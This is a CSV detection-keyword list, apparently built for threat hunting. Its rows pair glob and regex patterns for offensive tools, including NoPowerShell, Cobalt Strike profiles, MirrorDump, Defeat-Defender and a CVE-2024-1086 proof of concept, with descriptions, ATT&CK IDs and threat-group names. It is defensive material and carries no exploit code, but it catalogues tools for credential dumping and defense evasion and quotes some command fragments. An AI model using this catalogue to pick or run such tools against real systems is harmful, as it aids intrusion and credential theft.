"*NoPowerShell.Commands*",".{0,1000}NoPowerShell\.Commands.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.Commands.Management*",".{0,1000}NoPowerShell\.Commands\.Management.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.csproj*",".{0,1000}NoPowerShell\.csproj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.dll*",".{0,1000}NoPowerShell\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*nopowershell.exe*",".{0,1000}nopowershell\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.exe*",".{0,1000}NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.sln*",".{0,1000}NoPowerShell\.sln.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell/*.cs*",".{0,1000}NoPowerShell\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell_trunk.zip*",".{0,1000}NoPowerShell_trunk\.zip.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell32.dll*",".{0,1000}NoPowerShell32\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell64.dll*",".{0,1000}NoPowerShell64\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShellDll.*",".{0,1000}NoPowerShellDll\..{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*normal/randomized.profile*",".{0,1000}normal\/randomized\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*northdata-get-company-names *",".{0,1000}northdata\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*noseyparker report --datastore *",".{0,1000}noseyparker\sreport\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker scan --datastore *",".{0,1000}noseyparker\sscan\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker summarize --datastore *",".{0,1000}noseyparker\ssummarize\s\-\-datastore\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-cli*",".{0,1000}noseyparker\-cli.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-main*",".{0,1000}noseyparker\-main.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-v*-universal-macos*",".{0,1000}noseyparker\-v.{0,1000}\-universal\-macos.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*noseyparker-v*-x86_64-unknown-linux-gnu*",".{0,1000}noseyparker\-v.{0,1000}\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*Nosql-Exploitation-Framework*",".{0,1000}Nosql\-Exploitation\-Framework.{0,1000}","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Frameworks","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","6","593","157","2024-04-30T18:18:31Z","2013-12-26T17:46:11Z" "*NoSQLMap*",".{0,1000}NoSQLMap.{0,1000}","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2759","570","2024-04-08T15:41:52Z","2013-09-24T15:01:30Z" "*notdodo/LocalAdminSharp*",".{0,1000}notdodo\/LocalAdminSharp.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*notepad FUZZ*",".{0,1000}notepad\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*NotLSASS.zip*",".{0,1000}NotLSASS\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*NotLSASS1.zip*",".{0,1000}NotLSASS1\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*notredamecheatstowin>*",".{0,1000}notredamecheatstowin\>.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Notselwyn/CVE-2024-1086*",".{0,1000}Notselwyn\/CVE\-2024\-1086.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*Notselwyn/netkit*",".{0,1000}Notselwyn\/netkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","1","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*NovaLdr-main*",".{0,1000}NovaLdr\-main.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*novelbfh.zip*",".{0,1000}novelbfh\.zip.{0,1000}","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*",".{0,1000}\-\-noWAIT\s\-\-noFUNC\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*nping *",".{0,1000}nping\s.{0,1000}","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*nps_payload*",".{0,1000}nps_payload.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*nps_payload.py*",".{0,1000}nps_payload\.py.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*nps_payload-master*",".{0,1000}nps_payload\-master.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*nrf24-scanner.py -l -v*",".{0,1000}nrf24\-scanner\.py\s\-l\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*nrpc.py*",".{0,1000}nrpc\.py.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*NSAKEY/nsa-rules*",".{0,1000}NSAKEY\/nsa\-rules.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*nsa-rules-master*",".{0,1000}nsa\-rules\-master.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*nselib/data/passwords.lst*",".{0,1000}nselib\/data\/passwords\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*NSudo -U:T -ShowWindowMode:Hide*",".{0,1000}NSudo\s\-U\:T\s\-ShowWindowMode\:Hide.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*NT AUTHOIRTY\SYSTEM*",".{0,1000}NT\sAUTHOIRTY\\SYSTEM.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*ntcreatethread.x64*",".{0,1000}ntcreatethread\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 